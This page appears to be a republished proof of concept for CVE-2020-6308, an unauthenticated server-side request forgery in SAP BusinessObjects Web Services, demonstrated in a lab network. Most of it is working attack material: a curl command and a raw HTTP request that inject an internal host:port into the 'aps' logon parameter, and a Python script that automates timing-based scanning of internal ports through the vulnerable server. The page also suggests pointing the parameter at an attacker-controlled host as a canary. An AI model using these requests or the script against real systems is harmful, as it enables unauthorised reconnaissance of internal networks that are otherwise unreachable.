CVE-2020-6308 SAP POC

Category: Security Tools


SAP BusinessObjects Business Intelligence Platform (Web Services), versions 410, 420 and 430, allows an unauthenticated attacker to inject arbitrary values as CMS parameters and use them to send queries into the internal network, which is otherwise not reachable from outside.


In the example below I show how to use curl requests to find open ports. The lab has one SAP host (192.168.0.191), one attacker machine (192.168.0.149) and a third device, here an internal router (192.168.0.1).


Our SAP host has the following ports open.


And our internal router has the following open ports: 53, 80, 34573


The request below is the Burp "copy as curl" export, wrapped onto several lines. The explicit Content-Length header and the duplicate Cookie header from the export are dropped so that curl computes the body length itself (the exported value did not match the body). The aps value is the internal host:port being probed, and time is used to record how long the server takes to answer.

time curl -i -s -k -X POST \
  -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:81.0) Gecko/20100101 Firefox/81.0' \
  -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' \
  -H 'Accept-Language: en-US,en;q=0.5' \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  -H 'Origin: http://192.168.0.191:8080' \
  -H 'Referer: http://192.168.0.191:8080/AdminTools/querybuilder/ie.jsp' \
  -H 'Connection: close' \
  -H 'Upgrade-Insecure-Requests: 1' \
  -b 'JSESSIONID=8EE4AA85EB930DEB7090187F4CB4711B; developer_samples_app_lastusr=admin; developer_samples_app_lastaps=192.168.0.191; developer_samples_app_lastaut=secEnterprise' \
  --data-binary 'aps=192.168.0.1:53&usr=admin&pwd=&aut=secEnterprise&main_page=ie.jsp&new_pass_page=newpwdform.jsp&exit_page=logonform.jsp' \
  'http://192.168.0.191:8080/AdminTools/querybuilder/logon?framework='


Testing the following payloads.


192.168.0.1:4 and 192.168.0.1:5: here you can see the timing results for closed ports, which average around 5 ms.


192.168.0.1:22 and 192.168.0.1:80: here you can see the timing results for open/filtered ports. The response time, compared against the closed-port timings, is what tells the two cases apart.


The case below is not ideal, because different routes and some firewalls affect the timings.
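The procedure above (time one closed port as a baseline, then time each candidate port through the aps parameter) can be automated. The script below is an added example written for this page, not code from the page or from the InitRoot PoC repository. It reuses the exact logon form from the curl request; the classification thresholds (5x the baseline and at least 0.5 s slower), the choice of port 4 as the known-closed calibration port, and the FAKE_RTT timings used so the demo runs offline are all assumptions. Replace fake_sender with http_sender to probe a host you are authorised to test.

```python
"""Timing-based internal port probe through the aps parameter (added example)."""
import statistics
import time
import urllib.parse
import urllib.request

LOGON_PATH = "/AdminTools/querybuilder/logon?framework="


def build_logon_body(aps, usr="admin", pwd="", aut="secEnterprise"):
    """Form body of the querybuilder logon; `aps` is the injected CMS host:port."""
    fields = [
        ("aps", aps), ("usr", usr), ("pwd", pwd), ("aut", aut),
        ("main_page", "ie.jsp"), ("new_pass_page", "newpwdform.jsp"),
        ("exit_page", "logonform.jsp"),
    ]
    # safe=":" keeps host:port literal, matching the curl payload on this page
    return urllib.parse.urlencode(fields, safe=":")


def http_sender(base_url, aps, timeout=120):
    """Live sender: POST the logon form and return the round-trip time in seconds.
    Only the elapsed time is the oracle, so HTTP errors and timeouts are swallowed."""
    req = urllib.request.Request(
        base_url + LOGON_PATH,
        data=build_logon_body(aps).encode(),
        headers={"Content-Type": "application/x-www-form-urlencoded"},
        method="POST",
    )
    start = time.monotonic()
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            resp.read()
    except Exception:
        pass
    return time.monotonic() - start


# Constructed timings standing in for a live target so the demo runs offline
# (assumed values): ports 4 and 5 are closed on the router, 22/53/80 answer slowly.
FAKE_RTT = {
    "192.168.0.1:4": 0.005, "192.168.0.1:5": 0.006,
    "192.168.0.1:22": 2.1, "192.168.0.1:53": 2.0, "192.168.0.1:80": 1.9,
}


def fake_sender(base_url, aps):
    return FAKE_RTT.get(aps, 0.005)


def measure(sender, base_url, aps, samples=3):
    """Median of several probes; the median resists one slow route or firewall hiccup."""
    return statistics.median(sender(base_url, aps) for _ in range(samples))


def classify(elapsed, baseline, factor=5.0, min_delta=0.5):
    """Open/filtered when the probe is both relatively and absolutely slower than a
    known-closed port. Both thresholds are assumptions to tune per target."""
    if elapsed >= baseline * factor and elapsed - baseline >= min_delta:
        return "open|filtered"
    return "closed"


def scan(sender, base_url, target, ports, baseline_port=4, samples=3):
    """Calibrate on a closed port (the page uses 192.168.0.1:4), then probe each port."""
    baseline = measure(sender, base_url, f"{target}:{baseline_port}", samples)
    results = {}
    for port in ports:
        elapsed = measure(sender, base_url, f"{target}:{port}", samples)
        results[port] = (round(elapsed, 3), classify(elapsed, baseline))
    return baseline, results


if __name__ == "__main__":
    base, res = scan(fake_sender, "http://192.168.0.191:8080", "192.168.0.1", [5, 22, 53, 80])
    print(f"closed-port baseline: {base:.3f}s")
    for port, (rtt, verdict) in sorted(res.items()):
        print(f"192.168.0.1:{port:<5} {rtt:>7.3f}s  {verdict}")
```

Taking the median of a few samples and requiring an absolute gap as well as a ratio is what keeps the routing and firewall jitter mentioned above from producing false "open" verdicts. For the canary-token variant mentioned later on the page, the same build_logon_body is enough: set aps to a hostname you control and watch for the lookup or connection attempt.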


Below is what the request looks like in Burp; the aps parameter is the vulnerable injection point. A simpler PoC is to inject only a canary-token value as aps and wait for it to fire.


POST /AdminTools/querybuilder/logon?framework= HTTP/1.1
Host: 192.168.0.191:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 128
Origin: http://192.168.0.191:8080
Connection: close
Referer: http://192.168.0.191:8080/AdminTools/querybuilder/ie.jsp
Upgrade-Insecure-Requests: 1

aps=192.168.0.191&usr=admin&pwd=admin&aut=secEnterprise&main_page=ie.jsp&new_pass_page=newpwdform.jsp&exit_page=logonform.jsp



References:

https://github.com/InitRoot/CVE-2020-6308-PoC

This article was first published on the WeChat public account Khan安全团队 (Khan Security Team): CVE-2020-6308 SAP POC
